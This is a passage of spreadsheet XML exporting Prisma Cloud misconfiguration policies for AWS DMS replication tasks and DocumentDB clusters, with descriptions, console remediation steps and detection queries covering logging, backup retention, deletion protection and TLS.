      <c r="M1613" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1613" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1613" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1613" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1613" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R1613" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S1613" t="inlineStr"/>
      <c r="T1613" t="b">
        <v>0</v>
      </c>
      <c r="U1613" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1613" t="inlineStr">
        <is>
          <t>aws-dms-replication-task</t>
        </is>
      </c>
      <c r="W1613" t="inlineStr">
        <is>
          <t>This policy identifies AWS DMS replication task where logging is either not enabled or set below the minimum severity level, such as LOGGER_SEVERITY_DEFAULT, for SOURCE_CAPTURE and SOURCE_UNLOAD.
Logging is indispensable in DMS replication for various purposes, including monitoring, troubleshooting, auditing, performance analysis, error detection, recovery, and historical reporting. SOURCE_CAPTURE captures ongoing replication or CDC data from the source database, while SOURCE_UNLOAD unloads data during full load. Logging these tasks is crucial for ensuring data integrity, compliance, and accountability during migration.
It is recommended to enable logging for AWS DMS replication tasks and set a minimal logging level of DEFAULT for SOURCE_CAPTURE and SOURCE_UNLOAD to ensure that essential messages are logged, facilitating effective monitoring, troubleshooting, and compliance efforts.</t>
        </is>
      </c>
      <c r="X1613" t="inlineStr">
        <is>
          <t>To enable logging for  Source capture and  Source Unload DMS replicatation tasks log components during migration:
1. Log in to the AWS Management Console
2. In the console, select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. Navigate to 'Migration &amp; Transfer' from the 'Services' dropdown and select 'Database Migration Service'
4. In the navigation panel, under 'Migrate data', click on 'Database migration tasks'
5. Select the reported replication task and choose 'Modify' from the 'Actions' dropdown on the right
6. Under the 'Task settings' section, enable 'Turn on CloudWatch logs' under 'Task logs'
7. Set the log component severity for both 'Source capture' and 'Source Unload' components to 'Default' or greater according to your business requirements
8. Click 'Save' to save the changes</t>
        </is>
      </c>
      <c r="Y1613" t="inlineStr"/>
      <c r="Z1613" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-dms-replication-task' AND json.rule = ReplicationTaskSettings.Logging.EnableLogging is false or  ReplicationTaskSettings.Logging.LogComponents[?any( Id is member of ("SOURCE_CAPTURE","SOURCE_UNLOAD") and Severity is not member of ("LOGGER_SEVERITY_DEFAULT","LOGGER_SEVERITY_DEBUG","LOGGER_SEVERITY_DETAILED_DEBUG") )] exists</t>
        </is>
      </c>
      <c r="AA1613" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1613" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1613" t="inlineStr">
        <is>
          <t>PC-AWS-DMS-1227</t>
        </is>
      </c>
      <c r="AD1613" t="b">
        <v>1</v>
      </c>
      <c r="AE1613" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1613" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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13" t="inlineStr">
        <is>
          <t>e54f1f3f-4c32-4c6f-974e-71dfd1f0496c</t>
        </is>
      </c>
      <c r="AI1613" t="inlineStr">
        <is>
          <t>2104d0f8-3c2e-4f42-a48c-cd77b0aa64cc</t>
        </is>
      </c>
      <c r="AJ1613" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1613" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1614">
      <c r="A1614" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B1614" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1614" s="2" t="inlineStr"/>
      <c r="D1614" t="inlineStr"/>
      <c r="E1614" t="inlineStr"/>
      <c r="F1614" t="inlineStr"/>
      <c r="G1614" t="b">
        <v>1</v>
      </c>
      <c r="H16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614" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1614" t="inlineStr">
        <is>
          <t>aws-dms</t>
        </is>
      </c>
      <c r="K1614" t="inlineStr">
        <is>
          <t>AWS DMS replication task for the target database have logging not set to the minimum severity level</t>
        </is>
      </c>
      <c r="L1614" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1614" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1614" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1614" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1614" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1614" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R1614" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S1614" t="inlineStr"/>
      <c r="T1614" t="b">
        <v>0</v>
      </c>
      <c r="U1614" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1614" t="inlineStr">
        <is>
          <t>aws-dms-replication-task</t>
        </is>
      </c>
      <c r="W1614" t="inlineStr">
        <is>
          <t>This policy identifies the DMS replication tasks that are logging isn't enabled or the minimum severity level is less than LOGGER_SEVERITY_DEFAULT for TARGET_APPLY and TARGET_LOAD.
Amazon DMS Logging is crucial in DMS replication for monitoring, troubleshooting, auditing, performance analysis, error detection, recovery, and historical reporting. TARGET_APPLY and TARGET_LOAD must be logged because they manage to apply data and DDL changes, as well as loading data into the target database, crucial for maintaining data integrity during migration. The absence of logging for TARGET_APPLY and TARGET_LOAD components hampers monitoring, compliance, auditing, troubleshooting, and accountability efforts during migration.
It's recommended to enable logging for AWS DMS replication tasks and set a minimal logging level of DEFAULT for TARGET_APPLY and TARGET_LOAD to ensure that informational messages, warnings, and error messages are written to the logs.</t>
        </is>
      </c>
      <c r="X1614" t="inlineStr">
        <is>
          <t>To enable logging for Target Apply and Target Load DMS replication tasks log component during migration:
1. Log in to the AWS Management Console
2. In the console, select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. Navigate to 'Migration &amp; Transfer' from the 'Services' dropdown and select 'Database Migration Service'
4. In the navigation panel, under 'Migrate data', click on 'Database migration tasks'
5. Select the reported replication task and choose 'Modify' from the 'Actions' dropdown on the right
6. Under the 'Task settings' section, enable 'Turn on CloudWatch logs' under 'Task logs'
7. Set the log component severity for both 'Target apply' and 'Target Load' components to 'Default' or greater according to your business requirements
8. Click 'Save' to save the changes</t>
        </is>
      </c>
      <c r="Y1614" t="inlineStr"/>
      <c r="Z1614" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-dms-replication-task' AND json.rule = ReplicationTaskSettings.Logging.EnableLogging is false or  ReplicationTaskSettings.Logging.LogComponents[?any( Id is member of ("TARGET_APPLY","TARGET_LOAD") and Severity is not member of ("LOGGER_SEVERITY_DEFAULT","LOGGER_SEVERITY_DEBUG","LOGGER_SEVERITY_DETAILED_DEBUG") )] exists</t>
        </is>
      </c>
      <c r="AA1614" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1614" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1614" t="inlineStr">
        <is>
          <t>PC-AWS-DMS-1226</t>
        </is>
      </c>
      <c r="AD1614" t="b">
        <v>1</v>
      </c>
      <c r="AE1614" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1614" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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14" t="inlineStr">
        <is>
          <t>cb5f94a1-1af7-4867-bfc2-7bf6b64941f5</t>
        </is>
      </c>
      <c r="AI1614" t="inlineStr">
        <is>
          <t>788da4e0-a835-47eb-a846-bb16653f81b1</t>
        </is>
      </c>
      <c r="AJ1614" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1614" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1615">
      <c r="A1615" t="inlineStr"/>
      <c r="B1615" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1615" s="2" t="inlineStr"/>
      <c r="D1615" t="inlineStr"/>
      <c r="E1615" t="inlineStr"/>
      <c r="F1615" t="inlineStr"/>
      <c r="G1615" t="b">
        <v>1</v>
      </c>
      <c r="H16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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1615" t="inlineStr">
        <is>
          <t>aws-docdb</t>
        </is>
      </c>
      <c r="K1615" t="inlineStr">
        <is>
          <t>AWS DocumentDB clusters have backup retention period less than 7 days</t>
        </is>
      </c>
      <c r="L1615" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1615" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1615" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1615" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1615" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1615" t="inlineStr"/>
      <c r="R1615" t="inlineStr"/>
      <c r="S1615" t="inlineStr"/>
      <c r="T1615" t="b">
        <v>0</v>
      </c>
      <c r="U1615" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1615" t="inlineStr">
        <is>
          <t>aws-docdb-db-cluster</t>
        </is>
      </c>
      <c r="W1615" t="inlineStr">
        <is>
          <t>This policy identifies Amazon DocumentDB clusters lacking sufficient backup retention tenure.
Amazon DocumentDB clusters are managed database services on AWS, compatible with MongoDB. They handle tasks like provisioning and backup. With features like automated backups and read replicas, they offer a reliable solution for MongoDB workloads in the cloud. The backup retention period denotes the duration for storing automated backups of the DocumentDB cluster. Inadequate retention periods heighten the risk of data loss, compliance issues, and hinder effective recovery in security breaches or system failures.
It is recommended to ensure a backup retention period of at least 7 days or according to your business and compliance requirement.</t>
        </is>
      </c>
      <c r="X1615" t="inlineStr">
        <is>
          <t>To modify an Amazon DocumentDB cluster's backup retention period:
1. Sign in to the AWS Management Console.
2. In the console, select the specific region from the region dropdown in the top right corner where the alert is generated.
3. Navigate to the Amazon DocumentDB console by either searching for 'Amazon DocumentDB' in the AWS services search bar or directly accessing the Amazon DocumentDB service.
4. In the navigation pane, choose 'Clusters' and select the cluster name that is reported.
5. Click 'Actions' in the right corner, and then select 'Modify' from the drop-down menu.
6. On the Modify cluster page, under the 'Backup' section, select the desired backup retention period in days from the 'Backup retention period' drop-down menu based on your business or compliance requirements.
7. Click 'Continue' to review a summary of your changes.
8. Choose either 'Apply during the next scheduled maintenance window' or 'Apply immediately' based on your scheduling preference for modifications.
9. Click on 'Modify Cluster' to implement the changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-360
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-360</t>
        </is>
      </c>
      <c r="Y1615" t="inlineStr"/>
      <c r="Z1615" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-docdb-db-cluster' AND json.rule = Status equals available and ( BackupRetentionPeriod does not exist or BackupRetentionPeriod less than 7 )
{"category":"General","resourceTypes":["aws_docdb_cluster"]}</t>
        </is>
      </c>
      <c r="AA1615" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1615" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1615" t="inlineStr">
        <is>
          <t>PC-AWS-DOC-1156-CKV_AWS_360</t>
        </is>
      </c>
      <c r="AD1615" t="b">
        <v>1</v>
      </c>
      <c r="AE1615" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1615" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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5" t="inlineStr">
        <is>
          <t>93cb90e8-34c5-4906-bd46-aea61371f54c</t>
        </is>
      </c>
      <c r="AI1615" t="inlineStr">
        <is>
          <t>4ecc532c-f3ad-45a8-9eaa-e96ac5d4652c</t>
        </is>
      </c>
      <c r="AJ1615" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1615" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1616">
      <c r="A1616" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, ITSG-33, GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, NIST 800-53 Rev 5, TX-RAMP Level 2, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B1616" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1616" s="2" t="inlineStr"/>
      <c r="D1616" t="inlineStr"/>
      <c r="E1616" t="inlineStr"/>
      <c r="F1616" t="inlineStr"/>
      <c r="G1616" t="b">
        <v>1</v>
      </c>
      <c r="H16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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1616" t="inlineStr">
        <is>
          <t>aws-docdb</t>
        </is>
      </c>
      <c r="K1616" t="inlineStr">
        <is>
          <t>AWS DocumentDB cluster does not publish audit logs to CloudWatch Logs</t>
        </is>
      </c>
      <c r="L1616" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1616" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1616" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1616" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1616" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1616" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1616" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S1616" t="inlineStr"/>
      <c r="T1616" t="b">
        <v>0</v>
      </c>
      <c r="U1616" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1616" t="inlineStr">
        <is>
          <t>aws-docdb-db-cluster</t>
        </is>
      </c>
      <c r="W1616" t="inlineStr">
        <is>
          <t>This policy identifies the Amazon DocumentDB cluster where audit logging is disabled or audit logs are not published to Amazon CloudWatch Logs.
DocumentDB integrates with Amazon CloudWatch for performance metric gathering and analysis, supporting CloudWatch Alarms. While DocumentDB provides customizable audit logs for monitoring database operations, these logs are not automatically sent to CloudWatch Logs, limiting centralized monitoring and analysis of database activities.
It is recommended to configure the DocumentDB cluster to enable audit logs and publish audit logs to CloudWatch logs.</t>
        </is>
      </c>
      <c r="X1616" t="inlineStr">
        <is>
          <t>To create a custom parameter group if the cluster has only the default parameter group use the following steps: 
1. Sign in to the AWS Management Console and open the Amazon DocumentDB console. 
2. In the navigation pane, choose 'Parameter groups'. 
3. Choose 'Create'. The 'Create cluster parameter group' window appears. 
4. In the 'New cluster parameter group name', enter the name of the new DB cluster parameter group. 
5. In the 'Family' list, select a 'DB parameter group family'. 
6. In the Description box, enter a description for the new DB cluster parameter group. 
7. Click 'Create'. 
To modify the custom DB cluster parameter group to enable query logging, follow the below steps: 
1. Sign in to the AWS Management Console and open the Amazon DocumentDB console. 
2. In the navigation pane, choose 'Parameter groups'. 
3. In the list, choose the above-created parameter group or the reported resource custom parameter group that you want to modify. 
4. Click on the 'audit_logs' parameter and click 'Edit'. 
5. Change the value of the 'audit_logs' parameter to any value (ddl,dml_read,dml_write, all) other than 'disabled' or 'none' you want to modify according to your requirements. 
6. Choose 'Apply immediately' to apply the changes immediately or 'Apply during the next scheduled maintenance window' according to your requirements. 
7. Choose 'Modify cluster parameter' to modify the values. 
To modify an AWS DocumentDB cluster to use the custom parameter group, follow the below steps: 
1. Sign in to the AWS Management Console and open the Amazon DocumentDB console. 
2. In the navigation pane, choose 'Databases', and then choose the 'DB instance' that you want to modify. 
3. Choose the reported cluster that you want to associate your parameter group with. Choose 'Actions', and then choose 'Modify' to modify your cluster. 
4. Scroll down to 'Cluster options', select the above-created cluster parameter group from the DB parameter group dropdown. 
5. Choose 'Continue' and check the summary of modifications. 
6. Choose 'Apply immediately' to apply the changes immediately or 'Apply during the next scheduled maintenance window' according to your requirements. 
7. On the confirmation page, review your changes. If they are correct, choose 'Modify cluster' to save your changes. 
When the value of the audit_logs cluster parameter is enabled, ddl, dml_read, or dml_write, you must also enable Amazon DocumentDB to export logs to Amazon CloudWatch. If you omit either of these steps, audit logs will not be sent to CloudWatch. 
To modify an Amazon DocumentDB cluster for enabling export logs to cloudwatch, follow the below steps: 
1. Sign in to the AWS Management Console and open the Amazon DocumentDB console. 
2. In the navigation pane, choose 'Databases', and then choose the 'DB instance' that you want to modify. 
3. Choose the reported cluster that you want to associate your parameter group with. Choose 'Actions', and then choose 'Modify' to modify your cluster.
4. Scroll down to the Log exports section, and choose 'Enable' for the 'Audit logs'.
5. Choose 'Continue'.
6. Choose 'Apply immediately' to apply the changes immediately or 'Apply during the next scheduled maintenance window' according to your requirements.
7. Choose 'Modify cluster'.</t>
        </is>
      </c>
      <c r="Y1616" t="inlineStr"/>
      <c r="Z1616" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-docdb-db-cluster' AND json.rule = Status equals "available" as X; config from cloud.resource where api.name = 'aws-docdb-db-cluster-parameter-group' AND json.rule = parameters.audit_logs.ParameterValue is member of ( 'disabled','none') as Y; filter '($.X.EnabledCloudwatchLogsExports.member does not contain "audit") or $.X.DBClusterParameterGroup equals $.Y.DBClusterParameterGroupName' ; show X;</t>
        </is>
      </c>
      <c r="AA1616" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1616" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1616" t="inlineStr">
        <is>
          <t>PC-AWS-DOC-1160</t>
        </is>
      </c>
      <c r="AD1616" t="b">
        <v>1</v>
      </c>
      <c r="AE1616" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1616" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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6" t="inlineStr">
        <is>
          <t>64308452-3d8f-4a1c-b566-a49f9a7c221b</t>
        </is>
      </c>
      <c r="AI1616" t="inlineStr">
        <is>
          <t>308c65cf-bc43-4e9c-8867-d9e39d3d221c</t>
        </is>
      </c>
      <c r="AJ1616" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1616" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1617">
      <c r="A1617" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-171 Revision 3, Telecommunications Security Act - TSA, MLPS 2.0 (Level 2), TX-RAMP Level 1, Secure Controls Framework (SCF) - 2024.2, Korea – Information Security Management System (ISMS), ITSG-33, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B1617" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1617" s="2" t="inlineStr"/>
      <c r="D1617" t="inlineStr"/>
      <c r="E1617" t="inlineStr"/>
      <c r="F1617" t="inlineStr"/>
      <c r="G1617" t="b">
        <v>1</v>
      </c>
      <c r="H16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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1617" t="inlineStr">
        <is>
          <t>aws-docdb</t>
        </is>
      </c>
      <c r="K1617" t="inlineStr">
        <is>
          <t>AWS DocumentDB cluster deletion protection is disabled</t>
        </is>
      </c>
      <c r="L1617" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1617" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1617" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1617" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1617" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1617" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R1617" t="inlineStr">
        <is>
          <t>CM-02-00 : Baseline Configuration</t>
        </is>
      </c>
      <c r="S1617" t="inlineStr"/>
      <c r="T1617" t="b">
        <v>0</v>
      </c>
      <c r="U1617" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1617" t="inlineStr">
        <is>
          <t>aws-docdb-db-cluster</t>
        </is>
      </c>
      <c r="W1617" t="inlineStr">
        <is>
          <t>This policy identifies AWS DocumentDB clusters for which deletion protection is disabled. Enabling deletion protection for DocumentDB clusters prevents irreversible data loss resulting from accidental or malicious operations.</t>
        </is>
      </c>
      <c r="X1617" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Select the region, from the region drop-down, for which the alert is generated
3. Navigate to Amazon DocumentDB Dashboard
4. Select the reported DocumentDB cluster
5. From top right 'Actions' drop down list select 'Enable deletion protection'
6. Schedule the modifications and click on 'Modify cluster'</t>
        </is>
      </c>
      <c r="Y1617" t="inlineStr"/>
      <c r="Z1617" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-docdb-db-cluster' AND json.rule = Status contains available and DeletionProtection is false</t>
        </is>
      </c>
      <c r="AA1617" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1617" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1617" t="inlineStr">
        <is>
          <t>PC-AWS-DOC-914</t>
        </is>
      </c>
      <c r="AD1617" t="b">
        <v>1</v>
      </c>
      <c r="AE1617" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1617" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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7" t="inlineStr">
        <is>
          <t>95cc1059-dc20-4b91-9f05-63af346947b5</t>
        </is>
      </c>
      <c r="AI1617" t="inlineStr">
        <is>
          <t>616544ff-976c-424e-99dd-43bda5dcd29b</t>
        </is>
      </c>
      <c r="AJ1617" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1617" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1618">
      <c r="A1618" t="inlineStr">
        <is>
          <t>HIPAA, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ITSG-33, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Telecommunications Security Act - TSA, CRI Profile v2.0, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, DORA, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), Microsoft Cloud Security Benchmark v1, NIST CSF v2.0, HIPAA, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1618" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1618" s="2" t="inlineStr"/>
      <c r="D1618" t="inlineStr"/>
      <c r="E1618" t="inlineStr"/>
      <c r="F1618" t="inlineStr"/>
      <c r="G1618" t="b">
        <v>1</v>
      </c>
      <c r="H16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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1618" t="inlineStr">
        <is>
          <t>aws-docdb</t>
        </is>
      </c>
      <c r="K1618" t="inlineStr">
        <is>
          <t>AWS DocumentDB Cluster is not enabled with data encryption in transit</t>
        </is>
      </c>
      <c r="L1618" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1618" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1618" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1618" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1618" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1618" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1618" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1618" t="inlineStr"/>
      <c r="T1618" t="b">
        <v>0</v>
      </c>
      <c r="U1618" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1618" t="inlineStr">
        <is>
          <t>aws-docdb-db-cluster-parameter-group</t>
        </is>
      </c>
      <c r="W1618" t="inlineStr">
        <is>
          <t>This policy identifies Amazon DocumentDB Clusters for which data encryption in transit is disabled. Each DocumentDB Cluster is associated with a Cluster Parameter Group. It is highly recommended to implement in-transit encryption in order to protect data from unauthorized access as it travels through the network, between clients and the cluster.</t>
        </is>
      </c>
      <c r="X1618" t="inlineStr">
        <is>
          <t>To modify the Parameter group
1. Sign in to the AWS console
2. Select the region, from the region drop-down, for which the alert is generated
3. Navigate to Amazon DocumentDB Dashboard
4. Click on the 'Parameter groups' (Left panel)
5. Select the db cluster parameter group which is associated with the DocumentDB cluster on which the alert is generated
6. Select the \"tls\" parameter
7. Click on \"Edit\" button
8. Set value to \"enabled\"
9. Click on \"Modify cluster parameter\" button
To restart the Document DB cluster
1. Sign in to the AWS console
2. Select the region, from the region drop-down, for which the alert is generated
3. Navigate to Amazon DocumentDB Dashboard
4. Click on the 'Clusters' (Left panel)
5. Select the db cluster parameter group which is associated with the DocumentDB cluster on which the alert is generated, and choose the button to the left of its name.
6. Choose \"Actions\", and then \"Reboot\".
7. Click on \"Reboot\" button.</t>
        </is>
      </c>
      <c r="Y1618" t="inlineStr"/>
      <c r="Z1618" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-docdb-db-cluster-parameter-group' AND json.rule = parameters.tls.ParameterValue equals "disabled" as X; config from cloud.resource where api.name = 'aws-docdb-db-cluster' AND json.rule = Status equals available as Y; filter '$.X.DBClusterParameterGroupName equals $.Y.DBClusterParameterGroup'; show Y;</t>
        </is>
      </c>
      <c r="AA1618" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1618" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1618" t="inlineStr">
        <is>
          <t>PC-AWS-DOC-882</t>
        </is>
      </c>
      <c r="AD1618" t="b">
        <v>1</v>
      </c>
      <c r="AE1618" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1618" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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8" t="inlineStr">
        <is>
          <t>8a1eca79-23af-45b2-bda4-ba6b2f4fa14a</t>
        </is>
      </c>
      <c r="AI1618" t="inlineStr">
        <is>
          <t>5884383b-5436-48fb-b76f-aa28e7edb4b8</t>
        </is>
      </c>
      <c r="AJ1618" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1618" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1619">
      <c r="A1619" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, SOC 2</t>
        </is>
      </c>
      <c r="B1619" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1619" s="2" t="inlineStr"/>
      <c r="D1619" t="inlineStr"/>
      <c r="E1619" t="inlineStr"/>
      <c r="F1619" t="inlineStr"/>
      <c r="G1619" t="b">
        <v>1</v>
      </c>
      <c r="H16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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1619" t="inlineStr">
        <is>
